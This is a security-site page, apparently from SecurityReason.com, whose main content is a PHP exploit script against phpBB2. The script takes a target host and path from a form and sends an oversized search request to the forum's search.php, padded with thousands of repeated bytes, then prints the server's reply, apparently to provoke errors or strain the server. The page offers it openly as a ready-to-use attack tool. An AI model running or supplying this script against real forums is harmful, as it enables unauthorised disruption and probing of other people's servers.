|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityReason Exploit |
 Exploit Code : <? # # phpBB2018 examples errors # SecurityReason.Com (Maksymilian Arciemowicz) # cxib [at] securityreason [dot] com # http://securityreason.com/key/Arciemowicz.Maksymilian.gpg # if(isset($_POST['HOST']) AND isset($_POST['CAT']) AND isset($_POST['ILE'])){ $POSTx="SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCo mSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecuri tyReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReaso nComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSec urityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRe asonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCom SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurit yReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReason ComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecu rityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRea sonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComS ecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurity ReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonC omSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecur ityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReas onComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSe curityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityR easonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCo mSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecuri tyReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReaso nComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSec urityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRe asonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCom SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurit yReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReason ComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecu rityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRea sonComSecurityReasonComSecurity"; # 2048b $POST = "mode=results&search_keywords="; for($x=1; $x<=$_POST['ILE']; $x++){ $POST .= $POSTx; # f(x)=x * 2048b } $sock = fsockopen($_POST['HOST'], 80); if (!$sock) {return false;} $out = "POST ".$_POST['CAT']."search.php HTTP/1.1\r\n"; $out .= "Host: ".$_POST['HOST']."\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\n"; $out .= "Content-Length: ".strlen($POST)."\n\n"; $out .= $POST."\r\n"; fwrite($sock, $out); $data=""; while(!feof($sock)) { $data .= fread($sock,4096); } fclose($sock); $data = substr($data, strpos($data,"\r\n\r\n")+4); echo $data; } else { echo "<CENTER> <A HREF=\"http://securityreason.com\"><IMG SRC=\"http://securityreason.com/gfx/small_log o.png\"></A><P> <FORM action=\"\" method=post enctype=\"multipart/form-data\"> HOST: <input TYPE=\"text\" name=\"HOST\"> Like www.securityreason.com<br> CATALOG: <input TYPE=\"text\" name=\"CAT\"> Like: /phpBB2/<br> f(x)= <input TYPE=\"text\" name=\"ILE\" value=\"512\"> x 2048b (example 512 x 2048)<br> <input TYPE=\"submit\" value=\"Send\"> </FORM>"; } ?> |
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |